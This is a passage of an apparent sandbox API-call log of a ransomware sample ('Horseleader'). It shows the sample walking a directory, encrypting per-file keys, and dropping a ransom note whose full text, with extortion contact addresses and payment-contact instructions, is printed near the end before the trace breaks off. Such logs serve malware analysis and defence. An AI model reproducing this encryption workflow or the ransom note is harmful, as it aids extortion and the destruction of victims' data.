ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="en-US", cAlternateFileName="")) returned 1 [0252.010] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0252.010] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US") returned 44 [0252.010] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0252.010] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0252.010] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0252.010] GetProcessHeap () returned 0x780000 [0252.010] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0252.010] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*") returned 46 [0252.010] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0252.012] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0252.012] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\.") returned 46 [0252.012] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0252.012] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0252.012] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0252.012] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\..") returned 47 [0252.013] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0252.013] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0252.017] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="hmmapi.dll.mui", cAlternateFileName="")) returned 1 [0252.017] lstrcmpiW (lpString1="hmmapi.dll.mui", lpString2="Windows") returned -1 [0252.017] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui") returned 59 [0252.018] StrStrIW (lpFirst="hmmapi.dll.mui", lpSrch=".horseleader") returned 0x0 [0252.018] lstrcmpW (lpString1="hmmapi.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0252.018] lstrcmpW (lpString1="hmmapi.dll.mui", lpString2="_uninstalling_.png") returned 1 [0252.018] lstrlenW (lpString=".testttjffg") returned 11 [0252.018] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui", lpSrch=".testttjffg") returned 0x0 [0252.018] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0252.018] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0252.018] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\hmmapi.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.020] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="iedvtool.dll.mui", cAlternateFileName="")) returned 1 [0252.020] lstrcmpiW (lpString1="iedvtool.dll.mui", lpString2="Windows") returned -1 [0252.020] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iedvtool.dll.mui") returned 61 [0252.020] StrStrIW (lpFirst="iedvtool.dll.mui", lpSrch=".horseleader") returned 0x0 [0252.020] lstrcmpW (lpString1="iedvtool.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0252.020] lstrcmpW (lpString1="iedvtool.dll.mui", lpString2="_uninstalling_.png") returned 1 [0252.020] lstrlenW (lpString=".testttjffg") returned 11 [0252.020] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iedvtool.dll.mui", lpSrch=".testttjffg") returned 0x0 [0252.020] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0252.020] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0252.021] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iedvtool.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\iedvtool.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.021] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ieinstal.exe.mui", cAlternateFileName="")) returned 1 [0252.021] lstrcmpiW (lpString1="ieinstal.exe.mui", lpString2="Windows") returned -1 [0252.021] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui") returned 61 [0252.021] StrStrIW (lpFirst="ieinstal.exe.mui", lpSrch=".horseleader") returned 0x0 [0252.021] lstrcmpW (lpString1="ieinstal.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0252.021] lstrcmpW (lpString1="ieinstal.exe.mui", lpString2="_uninstalling_.png") returned 1 [0252.021] lstrlenW (lpString=".testttjffg") returned 11 [0252.021] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui", lpSrch=".testttjffg") returned 0x0 [0252.021] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0252.021] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0252.021] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\ieinstal.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.022] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ielowutil.exe.mui", cAlternateFileName="")) returned 1 [0252.022] lstrcmpiW (lpString1="ielowutil.exe.mui", lpString2="Windows") returned -1 [0252.022] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ielowutil.exe.mui") returned 62 [0252.022] StrStrIW (lpFirst="ielowutil.exe.mui", lpSrch=".horseleader") returned 0x0 [0252.022] lstrcmpW (lpString1="ielowutil.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0252.022] lstrcmpW (lpString1="ielowutil.exe.mui", lpString2="_uninstalling_.png") returned 1 [0252.022] lstrlenW (lpString=".testttjffg") returned 11 [0252.022] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ielowutil.exe.mui", lpSrch=".testttjffg") returned 0x0 [0252.022] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0252.022] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0252.022] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ielowutil.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\ielowutil.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.022] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe647cb96, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe647cb96, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0xe45e4000, ftLastWriteTime.dwHighDateTime=0x1ca042a, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="iexplore.exe.mui", cAlternateFileName="")) returned 1 [0252.022] lstrcmpiW (lpString1="iexplore.exe.mui", lpString2="Windows") returned -1 [0252.022] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui") returned 61 [0252.022] StrStrIW (lpFirst="iexplore.exe.mui", lpSrch=".horseleader") returned 0x0 [0252.022] lstrcmpW (lpString1="iexplore.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0252.022] lstrcmpW (lpString1="iexplore.exe.mui", lpString2="_uninstalling_.png") returned 1 [0252.022] lstrlenW (lpString=".testttjffg") returned 11 [0252.022] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui", lpSrch=".testttjffg") returned 0x0 [0252.022] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0252.022] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0252.023] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\iexplore.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.023] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2e00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="jsdbgui.dll.mui", cAlternateFileName="")) returned 1 [0252.023] lstrcmpiW (lpString1="jsdbgui.dll.mui", lpString2="Windows") returned -1 [0252.023] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdbgui.dll.mui") returned 60 [0252.023] StrStrIW (lpFirst="jsdbgui.dll.mui", lpSrch=".horseleader") returned 0x0 [0252.023] lstrcmpW (lpString1="jsdbgui.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0252.023] lstrcmpW (lpString1="jsdbgui.dll.mui", lpString2="_uninstalling_.png") returned 1 [0252.023] lstrlenW (lpString=".testttjffg") returned 11 [0252.023] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdbgui.dll.mui", lpSrch=".testttjffg") returned 0x0 [0252.023] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0252.023] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0252.023] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdbgui.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\jsdbgui.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.023] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="jsdebuggeride.dll.mui", cAlternateFileName="")) returned 1 [0252.023] lstrcmpiW (lpString1="jsdebuggeride.dll.mui", lpString2="Windows") returned -1 [0252.023] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui") returned 66 [0252.023] StrStrIW (lpFirst="jsdebuggeride.dll.mui", lpSrch=".horseleader") returned 0x0 [0252.023] lstrcmpW (lpString1="jsdebuggeride.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0252.023] lstrcmpW (lpString1="jsdebuggeride.dll.mui", lpString2="_uninstalling_.png") returned 1 [0252.023] lstrlenW (lpString=".testttjffg") returned 11 [0252.023] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui", lpSrch=".testttjffg") returned 0x0 [0252.024] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0252.024] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0252.024] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\jsdebuggeride.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.024] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="JSProfilerCore.dll.mui", cAlternateFileName="")) returned 1 [0252.024] lstrcmpiW (lpString1="JSProfilerCore.dll.mui", lpString2="Windows") returned -1 [0252.024] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui") returned 67 [0252.024] StrStrIW (lpFirst="JSProfilerCore.dll.mui", lpSrch=".horseleader") returned 0x0 [0252.024] lstrcmpW (lpString1="JSProfilerCore.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0252.024] lstrcmpW (lpString1="JSProfilerCore.dll.mui", lpString2="_uninstalling_.png") returned 1 [0252.024] lstrlenW (lpString=".testttjffg") returned 11 [0252.024] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui", lpSrch=".testttjffg") returned 0x0 [0252.024] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0252.024] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0252.024] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\jsprofilercore.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.024] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="jsprofilerui.dll.mui", cAlternateFileName="")) returned 1 [0252.024] lstrcmpiW (lpString1="jsprofilerui.dll.mui", lpString2="Windows") returned -1 [0252.024] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsprofilerui.dll.mui") returned 65 [0252.024] StrStrIW (lpFirst="jsprofilerui.dll.mui", lpSrch=".horseleader") returned 0x0 [0252.025] lstrcmpW (lpString1="jsprofilerui.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0252.025] lstrcmpW (lpString1="jsprofilerui.dll.mui", lpString2="_uninstalling_.png") returned 1 [0252.025] lstrlenW (lpString=".testttjffg") returned 11 [0252.025] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsprofilerui.dll.mui", lpSrch=".testttjffg") returned 0x0 [0252.025] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0252.025] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0252.025] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsprofilerui.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\jsprofilerui.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.027] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="jsprofilerui.dll.mui", cAlternateFileName="")) returned 0 [0252.027] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0252.028] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\#Decrypt#.txt") returned 58 [0252.028] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\#Decrypt#.txt" (normalized: "c:\\program files\\internet explorer\\en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0252.030] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0252.030] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0252.031] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0252.031] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: 